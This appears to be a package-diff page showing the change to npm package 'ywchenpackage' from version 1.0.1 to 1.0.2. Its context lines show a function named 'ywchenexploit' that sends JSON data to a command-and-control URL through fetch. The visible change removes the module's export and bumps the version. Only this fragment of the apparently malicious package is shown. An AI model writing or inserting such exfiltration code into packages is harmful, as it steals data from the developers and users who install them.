RubyGems
npm
Organizations
Log in
Sign up
npm
ywchenpackage
Versions diffs
1.0.1 → 1.0.2
ywchenpackage 1.0.1 → 1.0.2
Sign up to get
free
protection for your applications and to get access to all the features.
Files changed (2)
hide
show
package/index.js
+1
-3
package/package.json
+1
-1
package/index.js
CHANGED
Viewed
@@ -11,6 +11,4 @@ function ywchenexploit() {
11
11
fetch(c2url + "?data=" + JSON.stringify(response[0]));
12
12
})
13
13
return "hello NPM"
14
-
}
15
-
16
-
module.exports = ywchenexploit
14
+
}
package/package.json
CHANGED
Viewed
@@ -1,6 +1,6 @@
1
1
{
2
2
"name": "ywchenpackage",
3
-
"version": "1.0.
1
",
3
+
"version": "1.0.
2
",
4
4
"description": "",
5
5
"main": "index.js",
6
6
"scripts": {